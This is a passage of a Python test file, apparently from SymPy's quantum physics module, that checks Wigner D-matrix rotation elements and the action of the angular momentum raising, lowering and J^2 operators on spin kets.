assert Rotation.D(1, 0, -1, alpha, beta, gamma).doit() == -sin(beta) / sqrt(
2
) * exp(I * gamma)
assert Rotation.D(1, -1, 1, alpha, beta, gamma).doit() == (1 - cos(beta)) / 2 * exp(
I * alpha
) * exp(-I * gamma)
assert Rotation.D(1, -1, 0, alpha, beta, gamma).doit() == sin(beta) / sqrt(2) * exp(
I * alpha
)
assert Rotation.D(1, -1, -1, alpha, beta, gamma).doit() == (
1 + cos(beta)
) / 2 * exp(I * alpha) * exp(I * gamma)
# j = 3/2
assert Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(3, 2), alpha, beta, gamma
).doit() == (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(3, 2), S.Half, alpha, beta, gamma
).doit() == -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
-I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-3, 2), alpha, beta, gamma
).doit() == (-3 * sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(-3, 2)
) * exp(
I * gamma * Rational(3, 2)
)
assert Rotation.D(
Rational(3, 2), S.Half, Rational(3, 2), alpha, beta, gamma
).doit() == sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
-I * alpha / 2
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(Rational(3, 2), S.Half, S.Half, alpha, beta, gamma).doit() == (
cos(beta / 2) + 3 * cos(beta * Rational(3, 2))
) / 4 * exp(-I * alpha / 2) * exp(-I * gamma / 2)
assert Rotation.D(
Rational(3, 2), S.Half, Rational(-1, 2), alpha, beta, gamma
).doit() == (sin(beta / 2) - 3 * sin(beta * Rational(3, 2))) / 4 * exp(
-I * alpha / 2
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), S.Half, Rational(-3, 2), alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
-I * alpha / 2
) * exp(
I * gamma * Rational(3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(3, 2), alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), S.Half, alpha, beta, gamma
).doit() == (-sin(beta / 2) + 3 * sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
-I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == (cos(beta / 2) + 3 * cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-3, 2), alpha, beta, gamma
).doit() == -sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha / 2
) * exp(
I * gamma * Rational(3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(3, 2), alpha, beta, gamma
).doit() == (3 * sin(beta / 2) - sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
I * gamma * Rational(-3, 2)
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), S.Half, alpha, beta, gamma
).doit() == sqrt(3) * (cos(beta / 2) - cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
-I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-1, 2), alpha, beta, gamma
).doit() == sqrt(3) * (sin(beta / 2) + sin(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
I * gamma / 2
)
assert Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-3, 2), alpha, beta, gamma
).doit() == (3 * cos(beta / 2) + cos(beta * Rational(3, 2))) / 4 * exp(
I * alpha * Rational(3, 2)
) * exp(
I * gamma * Rational(3, 2)
)
# j = 2
assert Rotation.D(2, 2, 2, alpha, beta, gamma).doit() == (
3 + 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(-2 * I * alpha) * exp(-2 * I * gamma)
assert (
Rotation.D(2, 2, 1, alpha, beta, gamma).doit()
== -((cos(beta) + 1) * exp(-2 * I * alpha) * exp(-I * gamma) * sin(beta)) / 2
)
assert Rotation.D(2, 2, 0, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(-2 * I * alpha)
assert Rotation.D(2, 2, -1, alpha, beta, gamma).doit() == (cos(beta) - 1) * sin(
beta
) / 2 * exp(-2 * I * alpha) * exp(I * gamma)
assert Rotation.D(2, 2, -2, alpha, beta, gamma).doit() == (
3 - 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(-2 * I * alpha) * exp(2 * I * gamma)
assert Rotation.D(2, 1, 2, alpha, beta, gamma).doit() == (cos(beta) + 1) * sin(
beta
) / 2 * exp(-I * alpha) * exp(-2 * I * gamma)
assert Rotation.D(2, 1, 1, alpha, beta, gamma).doit() == (
cos(beta) + cos(2 * beta)
) / 2 * exp(-I * alpha) * exp(-I * gamma)
assert Rotation.D(2, 1, 0, alpha, beta, gamma).doit() == -sqrt(6) * sin(
2 * beta
) / 4 * exp(-I * alpha)
assert Rotation.D(2, 1, -1, alpha, beta, gamma).doit() == (
cos(beta) - cos(2 * beta)
) / 2 * exp(-I * alpha) * exp(I * gamma)
assert Rotation.D(2, 1, -2, alpha, beta, gamma).doit() == (cos(beta) - 1) * sin(
beta
) / 2 * exp(-I * alpha) * exp(2 * I * gamma)
assert Rotation.D(2, 0, 2, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(-2 * I * gamma)
assert Rotation.D(2, 0, 1, alpha, beta, gamma).doit() == sqrt(6) * sin(
2 * beta
) / 4 * exp(-I * gamma)
assert Rotation.D(2, 0, 0, alpha, beta, gamma).doit() == (1 + 3 * cos(2 * beta)) / 4
assert Rotation.D(2, 0, -1, alpha, beta, gamma).doit() == -sqrt(6) * sin(
2 * beta
) / 4 * exp(I * gamma)
assert Rotation.D(2, 0, -2, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(2 * I * gamma)
assert Rotation.D(2, -1, 2, alpha, beta, gamma).doit() == (
2 * sin(beta) - sin(2 * beta)
) / 4 * exp(I * alpha) * exp(-2 * I * gamma)
assert Rotation.D(2, -1, 1, alpha, beta, gamma).doit() == (
cos(beta) - cos(2 * beta)
) / 2 * exp(I * alpha) * exp(-I * gamma)
assert Rotation.D(2, -1, 0, alpha, beta, gamma).doit() == sqrt(6) * sin(
2 * beta
) / 4 * exp(I * alpha)
assert Rotation.D(2, -1, -1, alpha, beta, gamma).doit() == (
cos(beta) + cos(2 * beta)
) / 2 * exp(I * alpha) * exp(I * gamma)
assert Rotation.D(2, -1, -2, alpha, beta, gamma).doit() == -(
(cos(beta) + 1) * sin(beta)
) / 2 * exp(I * alpha) * exp(2 * I * gamma)
assert Rotation.D(2, -2, 2, alpha, beta, gamma).doit() == (
3 - 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(2 * I * alpha) * exp(-2 * I * gamma)
assert Rotation.D(2, -2, 1, alpha, beta, gamma).doit() == (
2 * sin(beta) - sin(2 * beta)
) / 4 * exp(2 * I * alpha) * exp(-I * gamma)
assert Rotation.D(2, -2, 0, alpha, beta, gamma).doit() == sqrt(6) * sin(
beta
) ** 2 / 4 * exp(2 * I * alpha)
assert Rotation.D(2, -2, -1, alpha, beta, gamma).doit() == (cos(beta) + 1) * sin(
beta
) / 2 * exp(2 * I * alpha) * exp(I * gamma)
assert Rotation.D(2, -2, -2, alpha, beta, gamma).doit() == (
3 + 4 * cos(beta) + cos(2 * beta)
) / 8 * exp(2 * I * alpha) * exp(2 * I * gamma)
# Numerical tests
# j = 1/2
assert (
Rotation.D(S.Half, S.Half, S.Half, pi / 2, pi / 2, pi / 2).doit()
== -I * sqrt(2) / 2
)
assert (
Rotation.D(S.Half, S.Half, Rational(-1, 2), pi / 2, pi / 2, pi / 2).doit()
== -sqrt(2) / 2
)
assert (
Rotation.D(S.Half, Rational(-1, 2), S.Half, pi / 2, pi / 2, pi / 2).doit()
== sqrt(2) / 2
)
assert (
Rotation.D(
S.Half, Rational(-1, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(2) / 2
)
# j = 1
assert Rotation.D(1, 1, 1, pi / 2, pi / 2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.D(1, 1, 0, pi / 2, pi / 2, pi / 2).doit() == I * sqrt(2) / 2
assert Rotation.D(1, 1, -1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(1, 0, 1, pi / 2, pi / 2, pi / 2).doit() == -I * sqrt(2) / 2
assert Rotation.D(1, 0, 0, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(1, 0, -1, pi / 2, pi / 2, pi / 2).doit() == -I * sqrt(2) / 2
assert Rotation.D(1, -1, 1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(1, -1, 0, pi / 2, pi / 2, pi / 2).doit() == I * sqrt(2) / 2
assert Rotation.D(1, -1, -1, pi / 2, pi / 2, pi / 2).doit() == Rational(-1, 2)
# j = 3/2
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), S.Half, pi / 2, pi / 2, pi / 2
).doit()
== sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(3, 2), Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), S.Half, Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(6) / 4
)
assert (
Rotation.D(Rational(3, 2), S.Half, S.Half, pi / 2, pi / 2, pi / 2).doit()
== I * sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), S.Half, Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), S.Half, Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), S.Half, pi / 2, pi / 2, pi / 2
).doit()
== sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-1, 2), Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(3, 2), pi / 2, pi / 2, pi / 2
).doit()
== sqrt(2) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), S.Half, pi / 2, pi / 2, pi / 2
).doit()
== I * sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-1, 2), pi / 2, pi / 2, pi / 2
).doit()
== -sqrt(6) / 4
)
assert (
Rotation.D(
Rational(3, 2), Rational(-3, 2), Rational(-3, 2), pi / 2, pi / 2, pi / 2
).doit()
== -I * sqrt(2) / 4
)
# j = 2
assert Rotation.D(2, 2, 2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.D(2, 2, 1, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, 2, 0, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, 2, -1, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, 2, -2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.D(2, 1, 2, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, 1, 1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, 1, 0, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, 1, -1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, 1, -2, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, 0, 2, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, 0, 1, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, 0, 0, pi / 2, pi / 2, pi / 2).doit() == Rational(-1, 2)
assert Rotation.D(2, 0, -1, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, 0, -2, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, -1, 2, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, -1, 1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, -1, 0, pi / 2, pi / 2, pi / 2).doit() == 0
assert Rotation.D(2, -1, -1, pi / 2, pi / 2, pi / 2).doit() == S.Half
assert Rotation.D(2, -1, -2, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, -2, 2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
assert Rotation.D(2, -2, 1, pi / 2, pi / 2, pi / 2).doit() == I / 2
assert Rotation.D(2, -2, 0, pi / 2, pi / 2, pi / 2).doit() == -sqrt(6) / 4
assert Rotation.D(2, -2, -1, pi / 2, pi / 2, pi / 2).doit() == -I / 2
assert Rotation.D(2, -2, -2, pi / 2, pi / 2, pi / 2).doit() == Rational(1, 4)
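# Unevaluated rotation elements are represented as WignerD instances;
# Rotation.d is the special case of Rotation.D with alpha = gamma = 0.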
def test_wignerd():
assert Rotation.D(j, m, mp, alpha, beta, gamma) == WignerD(
j, m, mp, alpha, beta, gamma
)
assert Rotation.d(j, m, mp, beta) == WignerD(j, m, mp, 0, beta, 0)
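# Raising operator.  In the Jz basis the standard ladder relation
#     Jplus |j, m> = hbar*sqrt(j*(j + 1) - m*(m + 1)) |j, m + 1>
# applies directly; for Jx/Jy eigenstates the kets are first re-expressed in the
# Jz basis, which is where the nested WignerD sums in the symbolic results come from.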
def test_jplus():
assert Commutator(Jplus, Jminus).doit() == 2 * hbar * Jz
assert Jplus.matrix_element(1, 1, 1, 1) == 0
assert Jplus.rewrite("xyz") == Jx + I * Jy
# Normal operators, normal states
# Numerical
assert qapply(Jplus * JxKet(1, 1)) == -hbar * sqrt(2) * JxKet(
1, 0
) / 2 + hbar * JxKet(1, 1)
assert qapply(Jplus * JyKet(1, 1)) == hbar * sqrt(2) * JyKet(
1, 0
) / 2 + I * hbar * JyKet(1, 1)
assert qapply(Jplus * JzKet(1, 1)) == 0
# Symbolic
assert qapply(Jplus * JxKet(j, m)) == Sum(
hbar
* sqrt(-(mi ** 2) - mi + j ** 2 + j)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi + 1, 0, pi * Rational(3, 2), 0) * JxKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JyKet(j, m)) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 - mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JzKet(j, m)) == hbar * sqrt(j ** 2 + j - m ** 2 - m) * JzKet(
j, m + 1
)
# Normal operators, coupled states
# Numerical
assert qapply(Jplus * JxKetCoupled(1, 1, (1, 1))) == -hbar * sqrt(2) * JxKetCoupled(
1, 0, (1, 1)
) / 2 + hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jplus * JyKetCoupled(1, 1, (1, 1))) == hbar * sqrt(2) * JyKetCoupled(
1, 0, (1, 1)
) / 2 + I * hbar * JyKetCoupled(1, 1, (1, 1))
assert qapply(Jplus * JzKetCoupled(1, 1, (1, 1))) == 0
# Symbolic
assert qapply(Jplus * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(-(mi ** 2) - mi + j ** 2 + j)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi + 1, 0, pi * Rational(3, 2), 0)
* JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 - mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jplus * JzKetCoupled(j, m, (j1, j2))) == hbar * sqrt(
j ** 2 + j - m ** 2 - m
) * JzKetCoupled(j, m + 1, (j1, j2))
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == -hbar * sqrt(2) * TensorProduct(
JxKet(1, 0), JxKet(1, -1)
) / 2 + hbar * TensorProduct(
JxKet(1, 1), JxKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jplus) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
+ hbar * sqrt(2) * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(
JyKet(1, 0), JyKet(1, -1)
) / 2 + hbar * I * TensorProduct(
JyKet(1, 1), JyKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jplus) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== -hbar * I * TensorProduct(JyKet(1, 1), JyKet(1, -1))
+ hbar * sqrt(2) * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
)
assert (
qapply(TensorProduct(Jplus, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))) == 0
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0))
# Symbolic
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(-(mi ** 2) - mi + j1 ** 2 + j1)
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi + 1, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* sqrt(-(mi ** 2) - mi + j2 ** 2 + j2)
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi + 1, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(j1 ** 2 + j1 - mi ** 2 - mi)
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* sqrt(j2 ** 2 + j2 - mi ** 2 - mi)
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi + 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jplus, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j1 ** 2 + j1 - m1 ** 2 - m1) * TensorProduct(
JzKet(j1, m1 + 1), JzKet(j2, m2)
)
assert qapply(
TensorProduct(1, Jplus) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j2 ** 2 + j2 - m2 ** 2 - m2) * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2 + 1)
)
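# Lowering operator, mirroring test_jplus with Jminus = Jx - I*Jy and
#     Jminus |j, m> = hbar*sqrt(j*(j + 1) - m*(m - 1)) |j, m - 1>.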
def test_jminus():
assert qapply(Jminus * JzKet(1, -1)) == 0
assert Jminus.matrix_element(1, 0, 1, 1) == sqrt(2) * hbar
assert Jminus.rewrite("xyz") == Jx - I * Jy
# Normal operators, normal states
# Numerical
assert qapply(Jminus * JxKet(1, 1)) == hbar * sqrt(2) * JxKet(
1, 0
) / 2 + hbar * JxKet(1, 1)
assert qapply(Jminus * JyKet(1, 1)) == hbar * sqrt(2) * JyKet(
1, 0
) / 2 - hbar * I * JyKet(1, 1)
assert qapply(Jminus * JzKet(1, 1)) == sqrt(2) * hbar * JzKet(1, 0)
# Symbolic
assert qapply(Jminus * JxKet(j, m)) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi - 1, 0, pi * Rational(3, 2), 0) * JxKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JyKet(j, m)) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JzKet(j, m)) == hbar * sqrt(j ** 2 + j - m ** 2 + m) * JzKet(
j, m - 1
)
# Normal operators, coupled states
# Numerical
assert qapply(Jminus * JxKetCoupled(1, 1, (1, 1))) == hbar * sqrt(2) * JxKetCoupled(
1, 0, (1, 1)
) / 2 + hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jminus * JyKetCoupled(1, 1, (1, 1))) == hbar * sqrt(2) * JyKetCoupled(
1, 0, (1, 1)
) / 2 - hbar * I * JyKetCoupled(1, 1, (1, 1))
assert qapply(Jminus * JzKetCoupled(1, 1, (1, 1))) == sqrt(2) * hbar * JzKetCoupled(
1, 0, (1, 1)
)
# Symbolic
assert qapply(Jminus * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi - 1, 0, pi * Rational(3, 2), 0)
* JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JzKetCoupled(j, m, (j1, j2))) == hbar * sqrt(
j ** 2 + j - m ** 2 + m
) * JzKetCoupled(j, m - 1, (j1, j2))
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(
JxKet(1, 0), JxKet(1, -1)
) / 2 + hbar * TensorProduct(
JxKet(1, 1), JxKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jminus) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
- hbar * sqrt(2) * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(
JyKet(1, 0), JyKet(1, -1)
) / 2 - hbar * I * TensorProduct(
JyKet(1, 1), JyKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jminus) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== hbar * I * TensorProduct(JyKet(1, 1), JyKet(1, -1))
+ hbar * sqrt(2) * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == sqrt(2) * hbar * TensorProduct(JzKet(1, 0), JzKet(1, -1))
assert (
qapply(TensorProduct(1, Jminus) * TensorProduct(JzKet(1, 1), JzKet(1, -1))) == 0
)
# Symbolic
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(j1 ** 2 + j1 - mi ** 2 + mi)
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi - 1, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jminus) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* sqrt(j2 ** 2 + j2 - mi ** 2 + mi)
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi - 1, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(j1 ** 2 + j1 - mi ** 2 + mi)
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jminus) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* sqrt(j2 ** 2 + j2 - mi ** 2 + mi)
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j1 ** 2 + j1 - m1 ** 2 + m1) * TensorProduct(
JzKet(j1, m1 - 1), JzKet(j2, m2)
)
assert qapply(
TensorProduct(1, Jminus) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j2 ** 2 + j2 - m2 ** 2 + m2) * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2 - 1)
)
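# J^2 commutes with Jz and is diagonal in every basis used here,
#     J^2 |j, m> = hbar**2 * j*(j + 1) |j, m>,
# which is why each symbolic result appears as hbar**2*j**2*|ket> + hbar**2*j*|ket>.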
def test_j2():
assert Commutator(J2, Jz).doit() == 0
assert J2.matrix_element(1, 1, 1, 1) == 2 * hbar ** 2
# Normal operators, normal states
# Numerical
assert qapply(J2 * JxKet(1, 1)) == 2 * hbar ** 2 * JxKet(1, 1)
assert qapply(J2 * JyKet(1, 1)) == 2 * hbar ** 2 * JyKet(1, 1)
assert qapply(J2 * JzKet(1, 1)) == 2 * hbar ** 2 * JzKet(1, 1)
# Symbolic
assert qapply(J2 * JxKet(j, m)) == hbar ** 2 * j ** 2 * JxKet(
j, m
) + hbar ** 2 * j * JxKet(j, m)
assert qapply(J2 * JyKet(j, m)) == hbar ** 2 * j ** 2 * JyKet(
j, m
